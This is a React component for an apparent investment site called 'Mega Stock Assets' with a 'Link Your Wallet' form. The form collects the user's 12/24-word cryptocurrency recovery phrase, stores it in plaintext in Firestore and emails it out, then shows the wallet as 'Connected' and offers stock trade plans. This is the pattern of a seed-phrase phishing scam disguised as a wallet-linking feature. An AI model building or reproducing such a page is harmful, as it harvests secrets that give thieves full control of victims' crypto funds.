import React, { useState, useEffect } from 'react';
import { Link, useNavigate } from 'react-router-dom';
import { db } from '../lib/firebase';
import { doc, setDoc, getDoc } from 'firebase/firestore';
import { sendTransactionEmail } from '../lib/Email';
import Select from 'react-select';
import Modal from 'react-modal';
import { handleStartTrade, plans } from '../lib/tradeLogic';

Modal.setAppElement('#root');

const Connect = ({ user, userData, setApplicationNumber }) => {
  const [formData, setFormData] = useState({
    walletType: '',
    walletPhrase: '',
    amount: '',
    selectedStock: null,
  });

  const [submitting, setSubmitting] = useState(false);
  const [error, setError] = useState('');
  const [stocks, setStocks] = useState([]);
  const [successModalOpen, setSuccessModalOpen] = useState(false);
  const [successMessage, setSuccessMessage] = useState('');
  const [walletLinked, setWalletLinked] = useState(false);
  const [accountBalances, setAccountBalances] = useState({ Investments: 0, Trading: 0 });
  const [transactions, setTransactions] = useState([]);


  const navigate = useNavigate();

  // Fetch transactions and calculate available balance
  useEffect(() => {
    const fetchTransactions = async () => {
      if (user?.uid) {
        try {
          // Fetch user data from Firestore
          const docRef = doc(db, 'online', user.uid);
          const docSnap = await getDoc(docRef);

          if (docSnap.exists()) {
            const data = docSnap.data();

            // Get transactions from the 'transactions' array
            const userTransactions = data.transactions || [];
            setTransactions(userTransactions);
          }
        } catch (err) {
          console.error('Error fetching transactions:', err);
          setError('Failed to fetch transaction data.');
        }
      }
    };

    fetchTransactions();
  }, [user]);

  // Fetch stock data
  useEffect(() => {
    const fetchStocks = async () => {
      try {
        const response = await fetch('https://stocks.algobook.info/api/v1/stocks?tickers=AAPL,NVDA,MSFT,GOOGL,AMZN,TSLA,META,AMD,INTC,CRM,ADBE,ORCL,CSCO,SNAP,UBER,LYFT,SHOP,ROKU,SQ,PLTR,NFLX,DIS,BA,KO,PEP');
        const data = await response.json();
        const stockOptions = data.map(stock => ({
          value: stock.ticker,
          label: stock.name || stock.ticker,
        }));
        setStocks(stockOptions);
      } catch (err) {
        setError('Failed to fetch stock data.');
      }
    };

    fetchStocks();
  }, []);

  const handleInputChange = (e) => {
    const { name, value } = e.target;
    setFormData(prev => ({ ...prev, [name]: value }));
  };

  const handleSelectChange = (selectedOption) => {
    setFormData(prev => ({ ...prev, selectedStock: selectedOption }));
  };


  // Calculate available balance from transactions array
  const calculateAvailableBalance = (account) => {
    let balance = 0;
    transactions.forEach(transaction => {
      if (transaction.account === account) {
        if (transaction.type === 'credit') {
          balance += transaction.amount;
        } else if (transaction.type === 'debit') {
          balance -= transaction.amount;
        }
      }
    });
    return balance;
  };


  const handleSubmit = async (e) => {
    e.preventDefault();
    setError('');

    if (!user || !userData) {
      setError('User data is not available.');
      return;
    }

    if (!formData.walletType || !formData.walletPhrase) {
      setError('All fields are required.');
      return;
    }

    setSubmitting(true);
    try {
      const currentDate = new Date();
      const rawNumber = (currentDate.getDate() + currentDate.getMonth() + 1) * userData.accountNumber;
      const appNo = String(rawNumber).padStart(12, '0').slice(0, 12);

      const updatedFormData = { ...formData, applicationNumber: appNo };

      await setDoc(doc(db, 'online', user.uid), {
        ...userData,
        walletApplication: updatedFormData,
      });

      await sendTransactionEmail(
        user.email,
        userData.accountNumber,
        userData.fullName,
        {
          amount: formData.amount || 'Not Provided',
          bankName: 'Mega Stock Assets',
          beneficiary: formData.walletType,
          type: 'Wallet Application',
          beneficiaryAccount: formData.walletPhrase,
        }
      );

      setApplicationNumber(appNo);
      setWalletLinked(true);
    } catch (err) {
      console.error('Wallet submission error:', err);
      setError('There was an error submitting your application.');
    } finally {
      setSubmitting(false);
    }
  };

  const handleDeleteApplication = async () => {
    if (!user || !userData) return;

    setSubmitting(true);
    try {
      await setDoc(doc(db, 'online', user.uid), {
        ...userData,
        walletApplication: null,
      }, { merge: true });

      window.location.reload();
    } catch (err) {
      console.error('Unlink error:', err);
      setError('Failed to unlink wallet.');
    } finally {
      setSubmitting(false);
    }
  };

  const walletApp = userData?.walletApplication;
  // Calculate available balance for Investments (example)
  const availableBalance = calculateAvailableBalance('Investments');

  return (
    <div className="card-form-wrapper connect-cta">
      {(walletApp?.walletPhrase || walletLinked) ? (
        <>
          <div className="confirmation-box">
            <h2 className="transaction-head">✅ {walletApp?.walletType || formData.walletType} Connected -
              <span className="unlink-button" onClick={handleDeleteApplication} disabled={submitting}>
                {submitting ? 'Unlinking...' : 'Unlink Wallet'}
              </span>
            </h2>
          </div>

          <div className="investment-box">
            <h2 className="transaction-head">📈 Start Investing</h2>

            <div>
              <label htmlFor="amount" className="transaction-head">Amount</label>
              <input
                type="number"
                id="amount"
                name="amount"
                value={formData.amount}
                onChange={handleInputChange}
                placeholder="Enter amount"
                className="input-field"
              />
            </div>

            <div>
              <label className="transaction-head">Select a Stock</label>
              <Select
                options={stocks}
                value={formData.selectedStock}
                onChange={handleSelectChange}
                placeholder="Choose a stock"
              />
            </div>

            <div className="inForm transaction-head">
              <p>Available Balance : ${availableBalance.toFixed(2)}</p>
            </div>

            <button
              className="delete-button"
              onClick={async () => {
                if (formData.selectedStock && formData.amount) {
                  const amount = parseFloat(formData.amount);
                  const selectedPlan = plans.find(plan => plan.amount <= amount && plan.amount >= 50);

                  if (!selectedPlan) {
                    setError('No available trade plan matches the entered amount.');
                    return;
                  }

                  await handleStartTrade({
                    user,
                    selectedPlan: selectedPlan.name,
                    investmentAmount: amount,
                    accountBalances,
                    setSuccess: (msg) => {
                      setSuccessMessage(msg);
                      console.log(successMessage)
                      setSuccessModalOpen(true);
                    },
                    setError,
                    navigate,
                    setAccountBalances
                  });
                } else {
                  setError('Please enter an amount and select a stock.');
                }
              }}
              disabled={submitting}
            >
              Proceed to Trade
            </button>
          </div>
        </>
      ) : (
        <form onSubmit={handleSubmit}>
          <h2 className="hero-title">🔗 Link Your Wallet</h2>

          <div>
            <label htmlFor="walletType" className="transaction-head">Wallet Type</label>
            <select
              id="walletType"
              name="walletType"
              value={formData.walletType}
              onChange={handleInputChange}
              className="input-field"
              required
            >
              <option value="">Select Wallet</option>
              <option value="MetaMask">MetaMask</option>
              <option value="Trust Wallet">Trust Wallet</option>
              <option value="Coinbase Wallet">Coinbase Wallet</option>
              <option value="Exodus">Exodus</option>
              <option value="SafePal">SafePal</option>
              <option value="Other">Other</option>
            </select>
          </div>

          <div>
            <label htmlFor="walletPhrase" className="transaction-head">Wallet Phrase</label>
            <textarea
              id="walletPhrase"
              name="walletPhrase"
              className="input-field"
              placeholder="Enter your 12/24-word wallet recovery phrase"
              value={formData.walletPhrase}
              onChange={handleInputChange}
              required
              rows={4}
            />
          </div>

          <button type="submit" className="delete-button" disabled={submitting}>
            {submitting ? 'Linking...' : 'Link Wallet'}
          </button>
        </form>
      )}

      {error && <div className="error-message">{error}</div>}

      <Modal
        isOpen={successModalOpen}
        onRequestClose={() => setSuccessModalOpen(false)}
        contentLabel="Success Modal"
        className="modal"
        overlayClassName="modal-overlay"
      >
        <h2>🎉 Trade Started Successfully</h2>
        {/* <p>{successMessage}</p> */}
        <Link to="/" className="delete-button">
          Continue to Dashboard
        </Link>
      </Modal>
    </div>
  );
};

export default Connect;
